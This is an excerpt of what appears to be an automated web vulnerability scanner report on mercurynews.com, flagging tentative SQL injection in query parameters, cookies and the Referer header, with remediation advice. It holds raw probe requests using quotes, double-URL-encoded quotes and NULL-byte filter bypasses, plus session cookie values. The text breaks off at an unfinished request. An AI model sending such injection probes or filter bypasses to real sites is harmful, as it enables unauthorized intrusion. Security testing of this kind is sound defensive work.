NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /ci_16791927?source=most_viewed&1%00'=1 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Most of lame-duck governors final budget fix would extend into next fiscal year'><meta ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2=""; // Sub section 1
s.prop3=""; // Sub section 2
...[SNIP]...
Request 2
GET /ci_16791927?source=most_viewed&1%00''=1 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.mercurynews.com/ci_16791927?source=m ...[SNIP]...
The source parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the source parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /ci_16794599?source=most_emailed' HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Docent-led tours would be first, then full access for the public to drive to the top by 201 ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2=""; // Sub section 1
s.prop3=""; // Sub section 2
...[SNIP]...
Request 2
GET /ci_16794599?source=most_emailed'' HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Docent-led tours would be first, then full access for the public to drive to the top by 201 ...[SNIP]...
The u cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the u cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the u cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /ci_16794599?source=most_emailed HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B%2527; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Docent-led tours would be first, then full access for the public to drive to the top by 201 ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2=""; // Sub section 1
s.prop3=""; // Sub section 2
...[SNIP]...
Request 2
GET /ci_16794599?source=most_emailed HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B%2527%2527; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Docent-led tours would be first, then full access for the public to drive to the top by 201 ...[SNIP]...
The UserID cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the UserID cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the UserID cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /ci_16797127?source=most_emailed HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI%2527; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='It was billed as "An Evening with Leonard Cohen." And thats exactly what it was on Mon ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2=""; // Sub section 1
s.prop3=""; // Sub section 2
...[SNIP]...
Request 2
GET /ci_16797127?source=most_emailed HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI%2527%2527; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.mercurynews.com/ci_16797127?source=m ...[SNIP]...
1.193. http://www.mercurynews.com/ci_16797127 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Tentative
Host:
http://www.mercurynews.com
Path:
/ci_16797127
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /ci_16797127?1%2527=1 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='It was billed as "An Evening with Leonard Cohen." And thats exactly what it was on Mon ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2=""; // Sub section 1
s.prop3=""; // Sub section 2
...[SNIP]...
Request 2
GET /ci_16797127?1%2527%2527=1 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.mercurynews.com/ci_16797127?1%2527%2 ...[SNIP]...
The s_cc cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the s_cc cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the s_cc cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /ci_16797127?source=most_emailed HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true%2527; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='It was billed as "An Evening with Leonard Cohen." And thats exactly what it was on Mon ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2=""; // Sub section 1
s.prop3=""; // Sub section 2
...[SNIP]...
Request 2
GET /ci_16797127?source=most_emailed HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true%2527%2527; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.mercurynews.com/ci_16797127?source=m ...[SNIP]...
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the Referer HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /ci_16797755 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669; Referer: http://www.google.com/search?hl=en&q=%2527
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Death is citys 10th homicide of the year and second in as many days'><meta name="keywo ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2=""; // Sub section 1
s.prop3=""; // Sub section 2
...[SNIP]... <span style="font-family:arial;font-size:00.8em;color:#1F2058;"> If map fails to load please refresh your browser or click on the link below. <iframe width="280" height="250" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" src="http://maps.google.com/maps/ms?hl ...[SNIP]...
Request 2
GET /ci_16797755 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669; Referer: http://www.google.com/search?hl=en&q=%2527%2527
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.mercurynews.com/ci_16797755?nclick_c ...[SNIP]...
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /ci_16797755?source=most_viewed HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669; Referer: http://www.google.com/search?hl=en&q='
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Death is citys 10th homicide of the year and second in as many days'><meta name="keywo ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2=""; // Sub section 1
s.prop3=""; // Sub section 2
...[SNIP]... <span style="font-family:arial;font-size:00.8em;color:#1F2058;"> If map fails to load please refresh your browser or click on the link below. <iframe width="280" height="250" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" src="http://maps.google.com/maps/ms?hl ...[SNIP]...
Request 2
GET /ci_16797755?source=most_viewed HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669; Referer: http://www.google.com/search?hl=en&q=''
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.mercurynews.com/ci_16797755?source=m ...[SNIP]...
The currBrandCheck cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the currBrandCheck cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /ci_16797755?source=most_viewed HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews%00'; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Death is citys 10th homicide of the year and second in as many days'><meta name="keywo ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2=""; // Sub section 1
s.prop3=""; // Sub section 2
...[SNIP]... <span style="font-family:arial;font-size:00.8em;color:#1F2058;"> If map fails to load please refresh your browser or click on the link below. <iframe width="280" height="250" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" src="http://maps.google.com/maps/ms?hl ...[SNIP]...
Request 2
